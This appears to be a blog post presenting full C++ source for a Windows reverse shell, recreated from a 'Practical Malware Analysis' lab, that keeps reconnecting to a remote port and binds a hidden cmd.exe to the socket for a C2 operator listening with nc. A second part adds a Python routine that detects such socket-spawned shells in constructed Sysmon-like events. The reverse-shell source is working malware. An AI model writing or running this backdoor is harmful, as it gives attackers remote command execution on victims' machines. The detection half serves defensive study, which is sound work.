Reverse shell by redirecting CMD with CreateProcess
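This code is older than I am, haha~
What it does is simple: it keeps trying to send a reverse shell to some ip:port, and the C2 side can receive that reverse shell with nc.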
```cpp
// RedirectCmd.cpp : Defines the entry point for the console application.
// Recreation of sample 2 from the Chapter 9 labs of "Practical Malware Analysis"
#include "stdafx.h"
#include <WinSock2.h>
#include <Windows.h>
#pragma comment(lib,"ws2_32")

#define DELAYMILLSECOND 3000
#define REMOTE_PORT 9999
#define REMOTE_IP "localhost"
#define CMD_STR "cmd"

int _tmain(int argc, _TCHAR* argv[])
{
    while (1)
    {
        WSAData WsaData;
        if (0 != WSAStartup(MAKEWORD(2,2), &WsaData))
        {
            break;
        }
        SOCKET socket = WSASocketA(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
        if (INVALID_SOCKET == socket)
        {
            break;
        }
        hostent * host = gethostbyname(REMOTE_IP);
        if (NULL == host)
        {
            closesocket(socket);
            WSACleanup();
            Sleep(DELAYMILLSECOND);
            continue;
        }
        sockaddr socka;
        *(WORD*)socka.sa_data = ntohs(REMOTE_PORT);
        *(DWORD*)&socka.sa_data[2] = **(DWORD**)host->h_addr_list;
        socka.sa_family = AF_INET;
        int res = connect(socket,&socka,sizeof(socka));
        if (-1 == res)
        {
            closesocket(socket);
            WSACleanup();
            Sleep(DELAYMILLSECOND);
            continue;
        }
        // redirect cmd: the socket becomes stdin, stdout and stderr of a hidden child
        STARTUPINFOA sa = {0};
        PROCESS_INFORMATION pi = {0};
        sa.cb = sizeof(sa);
        sa.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        sa.wShowWindow = SW_HIDE;
        sa.hStdError = sa.hStdInput = sa.hStdOutput = (HANDLE)socket;
        CreateProcessA(0,CMD_STR,0,0,1,0,0,0,&sa,&pi);
        WaitForSingleObject(pi.hProcess,INFINITE);
        closesocket(socket);
        WSACleanup();
        Sleep(DELAYMILLSECOND);
    }
    return 0;
}
```
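Seen from the defender's side, the program above leaves a recognizable trace: a process opens an outbound TCP connection and immediately spawns cmd as its child, then repeats after the shell exits. The following added example (not part of the original post) correlates those two events over constructed, simplified records modelled on Sysmon process-creation (id 1) and network-connection (id 3) events; the field names, GUIDs, image paths, address and the 2-second window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events; field names are simplified assumptions,
# not the exact Sysmon schema.
EVENTS = [
    {"id": 3, "time": "2024-01-01 10:00:00.100", "guid": "A",
     "image": r"C:\Users\u\RedirectCmd.exe", "dst": "203.0.113.5:9999"},
    {"id": 1, "time": "2024-01-01 10:00:00.150", "guid": "B",
     "image": r"C:\Windows\System32\cmd.exe", "parent_guid": "A"},
    # Benign: interactive shell started from Explorer, no network activity.
    {"id": 1, "time": "2024-01-01 10:01:00.000", "guid": "D",
     "image": r"C:\Windows\System32\cmd.exe", "parent_guid": "E"},
    # Benign: updater connects, runs a script 30 s later (outside the window).
    {"id": 3, "time": "2024-01-01 10:02:00.000", "guid": "F",
     "image": r"C:\Program Files\App\updater.exe", "dst": "198.51.100.7:443"},
    {"id": 1, "time": "2024-01-01 10:02:30.000", "guid": "G",
     "image": r"C:\Windows\System32\cmd.exe", "parent_guid": "F"},
    # Same parent reconnects after the first shell exits (the retry loop).
    {"id": 3, "time": "2024-01-01 10:05:03.200", "guid": "A",
     "image": r"C:\Users\u\RedirectCmd.exe", "dst": "203.0.113.5:9999"},
    {"id": 1, "time": "2024-01-01 10:05:03.240", "guid": "C",
     "image": r"C:\Windows\System32\cmd.exe", "parent_guid": "A"},
]

SHELLS = {"cmd.exe", "powershell.exe"}

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f")

def find_socket_shells(events, window=timedelta(seconds=2)):
    """Flag shells whose parent made an outbound connection just before spawning them."""
    last_conn = {}  # process guid -> (time, destination) of its latest connection
    hits = []
    for ev in sorted(events, key=lambda e: parse(e["time"])):
        t = parse(ev["time"])
        if ev["id"] == 3:
            last_conn[ev["guid"]] = (t, ev["dst"])
        elif ev["id"] == 1:
            name = ev["image"].rsplit("\\", 1)[-1].lower()
            conn = last_conn.get(ev["parent_guid"])
            if name in SHELLS and conn and t - conn[0] <= window:
                hits.append({"parent": ev["parent_guid"], "shell": ev["guid"],
                             "dst": conn[1], "time": ev["time"]})
    return hits

if __name__ == "__main__":
    for hit in find_socket_shells(EVENTS):
        print(hit)
```

Two hits from the same parent to the same destination, separated by a shell lifetime plus a short delay, match the reconnect loop in the sample.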